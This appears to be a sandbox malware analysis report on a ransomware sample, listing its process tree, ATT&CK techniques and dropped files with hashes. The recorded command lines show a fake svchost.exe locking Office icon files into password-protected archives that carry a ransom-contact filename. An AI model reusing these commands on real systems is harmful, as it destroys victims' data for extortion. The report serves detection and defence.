  PID:4652
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.White.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.White.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2544
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3864
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:4884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3356
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Edit.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Edit.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:4896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Edit.White.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Edit.White.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6068
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2412
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\scrlk\svchost.exe
1⤵
PID:1008
- C:\scrlk\svchost.exe
  C:\scrlk\svchost.exe
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  PID:5236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\Lang\an.txt(!! to decrypt email id 440513544 to [email protected] !!).exe

Filesize
99KB

MD5
c42875f267b4284a5da9f9b1f300a5bd

SHA1
b00a65c983c8c9983c87106331918e2d3df70abd

SHA256
080bde1d74692e0f72c16c45b5d4f8f109d5b77f40dae7bd0d8135251426e2ce

SHA512
db56b3bdf0598c4e692e6982c0ca8d0ca794fb9fde3758c72979bdff5d82b83a72d80b132d756ecc53fb50e2f3bb97a0e5317d83d84835d8b80693d70de9237b

Download Submit
C:\Windows\SysWOW64\NoSafeMode.dll

Filesize
12KB

MD5
6bb3bca23fdff5b013863d8423267251

SHA1
2e6b80241d1a9269cc30e13663e6f910a0893450

SHA256
bdb1a0b687ced575e71702b7b4554063e697791bc2b2a286a0e4dfd528739670

SHA512
de6230dfe87df4840314983573c94ce332f5bfe9996de852c6e47844e785a4e7a8e4084a6d9ed1fd4aac78b896d2158a201ff202635c205bf50e2507c1165478

Download Submit
C:\Windows\SysWOW64\cfwin32.dll

Filesize
394KB

MD5
53894890dc01bbcace449f6590a1597b

SHA1
b27c93ef650d79a49150e61cd668b01bee543a30

SHA256
2f3f037b07737101076f50664ea3af10f76970febdcba4bd0e38d5a0eca4f6dd

SHA512
2ab1d894688ba8ee4129c575a116e7d01840d553a3956c3c158921e0794207ae9d0396c4c848c9e6592f40466e893ed19165e5eb34c53e02fe19fb65265c3a5a

Download Submit
C:\Windows\SysWOW64\csrss32.dll

Filesize
167KB

MD5
1ccda7a99f4552d258663a1dea54a07e

SHA1
b761408d4403ea07261cceb5a8afe789c4fc2c19

SHA256
098cccfa11432f742591078ab41571efa5e325c327a0f9797da385e48da09615

SHA512
f8e4c689608206cd0c5ccf9a36533ea74da7008a21e159ef7ebd199fd63a54c3a86f6842afefb282e5ebf1124664098d52b2acdcca53027d83d42248c2204b1e

Download Submit
C:\Windows\SysWOW64\csrss64.dll

Filesize
175KB

MD5
e42494d05a95f296bc38bedef3cba905

SHA1
aca3e577a7c8a40f6eb9aef1aa7573214853a723

SHA256
7d13d63c817ccdf3817b4d06bd20035535f238980d1b7b110713576dee97834e

SHA512
0fffff443a9c12e80b8af7caa4763fde76158c45cffc62f3d0773399b08592ddeae95d5ffb688ddbb29d5a08a3aadade0121f51aea3742cdc248dd45def14ce1

Download Submit
C:\Windows\SysWOW64\default2.sfx

Filesize
92KB

MD5
94059cc33eba96910993e644a55a1655

SHA1
c6c6ba99e43aa09a5bad6345a20b4dc530589862

SHA256
72af31e06d948f50fdc95526653bbad591b869e4542fc8fbb654ca49a2fd3574

SHA512
80048eb4b40b3e26a68af736bb8c7a459239763f69ed8f9e36bd243c1eed7c20901adaecf16bc993af0fbb2e35ae32bc0a13cc40329db42c251c05411a6aea5e

Download Submit
C:\Windows\SysWOW64\nsf.exe

Filesize
47KB

MD5
e6d58e0a4511695312f13d1b9f154187

SHA1
a23d75e1a3462e66db08f7664683e186c9e8e5fb

SHA256
ff16042183c0ed025c523ea1ae3edd679fd929dfbda0089756186f5bcba5b35b

SHA512
09b154123d8e21a7c93f8d99009e0e322a2ede7f4c8f12bcdebd0078787efb0f9d3b5e43a7b3936b933bd974777fccefbc3af24b834e8cd7137d2931cfeff833

Download Submit
C:\Windows\SysWOW64\svschost.exe

Filesize
34KB

MD5
60a87ec2fcea72cb0e254f8fd36c5006

SHA1
0b1dde47b736150a4e8338e65e48bb0a6ebf9c4b

SHA256
ba179f357218285c4518f792f1736ec0ee831c85298998a184ac4a1c6145eb7e

SHA512
7d5f64e6dc90e21bb4d6fc7d4c229622334bc8c0662b9227fe893286d373655c6c2664aa01648bc796383b80d225ad4038208db48e7fb796cc911b4093ff895d

Download Submit
C:\Windows\SysWOW64\uwnmspwks.rrr

Filesize
4KB

MD5
bc8a4f60d85519340c7f9d5d769f0dd4

SHA1
51f54115b7ffdd7c5541f295a4bb8080326f4719

SHA256
55472d0992da31650e83fae79e158410949de661a411181aefaa04e8be6b256a

SHA512
6f11dc2f156d95a0b1e0a2138f9fa94d497fc9b2957709ef79549769a464ca321f67502d2efbf306e7729c8169d53110fa3343611920be6722fa5b050597d579

Download Submit
memory/3460-36-0x0000000010000000-0x000000001000C000-memory.dmp

Filesize
48KB

Download
memory/3460-38-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/3460-30-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4376-41-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4376-45-0x0000000010000000-0x000000001000C000-memory.dmp

Filesize
48KB

Download
memory/4376-47-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads